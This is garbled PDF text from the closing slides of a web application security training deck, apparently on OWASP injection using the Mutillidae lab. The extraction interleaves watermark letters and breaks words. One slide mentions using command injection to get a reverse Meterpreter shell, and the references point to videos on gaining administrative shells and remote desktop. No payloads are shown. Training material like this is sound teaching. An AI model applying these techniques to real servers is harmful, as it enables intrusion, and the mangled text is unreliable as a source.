ts Command injec&on to gain reverse Meterpreter shell h g i R l Al D T • If the user under which the web server is running has prrivileges, the web SC fo server will connect back to a>acking host d re a
nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L L EIS
C
p e r -P
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
75
ui r D
yecurity Web Applica,on S m e er J t h OWASP A1-‐Injec,on g yri op C (c)
REFERENCES
C
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
76
R
ts • [1] OWASP Top 10 2013 h g i R l h`ps://www.owasp.org/index.php/Top_10_2013-‐Top_10 Al D T • [2] OWASP Louisville Chapter, h`ps://www.owasp.org/index.php/Louisville SC r fo • [3] OWASP Zed A`ack Proxy Project, OWASP, d re a p e h`ps://www.owasp.org/index.php/OWASP_Zed_A`ack_Proxy_Project r P C • [5] Burp-‐Suite Pro, PortSwigger Ltd h`p://portswigger.net/ LL
op C (c)
t h g yri
J
m e r e
y
uin r D
IS E d an
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
References
77
R
ed v r e es
ts • [6] Command-‐injec,on-‐to-‐shell h g i R l h`p://www.aldeid.com/wiki/Command-‐injec,on-‐to-‐shell Al Dand Disable T • [7] Mu,llidae: Command Injec,on to Dump Files, Start Services, SC r fo Firewall h`p://www.youtube.com/watch?v=1bXTq_qaa_U d re a [8] Mu,llidae: How to Locate the Easter egg File ursing p Command Injec,on e P h`p://www.youtube.com/watch?v=VWZYyH0VewQ C L LAccess via Command Injec,on S [9] Mu,llidae: Gaining Administra,ve Shell I E d h`p://www.youtube.com/watch?v=GRuRK-‐bejgM an n i ruInjec,on to Gain Remote Desktop [10] Mu,llidae: Using Command D y m e h`p://www.youtube.com/watch?v=if17nCdQfMg er op C (c)
t h g yri
J
© Copyright Jeremy Druin -‐ All Rights Reserved
References
78